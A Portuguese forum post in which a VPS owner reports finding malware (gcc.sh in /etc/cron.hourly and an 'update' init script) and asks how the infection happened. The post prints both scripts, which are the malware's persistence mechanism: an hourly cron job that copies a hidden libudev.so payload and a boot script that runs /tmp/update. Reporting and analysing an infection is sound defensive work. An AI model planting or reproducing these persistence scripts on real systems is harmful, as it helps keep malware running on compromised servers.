Malware gcc.sh

[PedroHenrique]

Boa tarde

Tenho um vps com vestacp que configurei a 30 dias, está vazio sem nenhum site ou programa. Ontem as 15:15 recebi email do servidor informando sobre erro na execução de um processo cron.hourly.  Então quando fui verificar era um arquivo malicioso chamado gcc.sh.

Então fui verificar o servidor e vi que foi criada uma entrada no crontab para executar este aquivo a cada 1 hora, no diretório /etc/cron.hourly foi criado esse arquivo gcc.sh e no diretório /et/init.d foi criado um arquivo chamado update. O conteudo dos aquivos é o seguinte:

1- gcc.sh

#!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done cp /lib/libudev.so /lib/libudev.so.6 /lib/libudev.so.6

 

Obs. eu recebi o aviso de erro do cron porque o arquivo libudev.so não existe no meu servidor, se existisse o script teria conseguido rodar.

 

2- update

#!/bin/sh
# chkconfig: 12345 90 90
# description: update
### BEGIN INIT INFO
# Provides:        update
# Required-Start:    
# Required-Stop:    
# Default-Start:    1 2 3 4 5
# Default-Stop:        
# Short-Description:    update
### END INIT INFO
case $1 in
start)
    /tmp/update
    ;;
stop)
    ;;
*)
    /tmp/update
    ;;
esac

 

Os amigos já tiveram problema com isso, sabem como pode ter sido feita essa infecção?

Detalhes: 

1- Esses arquivos gcc.sh e update não são localizados quando faz um busca com locate ou find.

2- Eu já vi em outra ocasião, esse mesmo arquivo gcc.sh dentro do public_html de algumas contas, em servidor cPanel, de um antigo cliente meu. Na época ele estava com problemas de spam e por coincidência encontrou esse arquivo.

3- Meu servidor está com a porta ssh alterada, senha complicada, firewall e fail2ban ativos, nos logs não consta comandos que não tenham sido executados por mim, nos logs de acesso não consta acessos ssh de IPs que não seja o meu.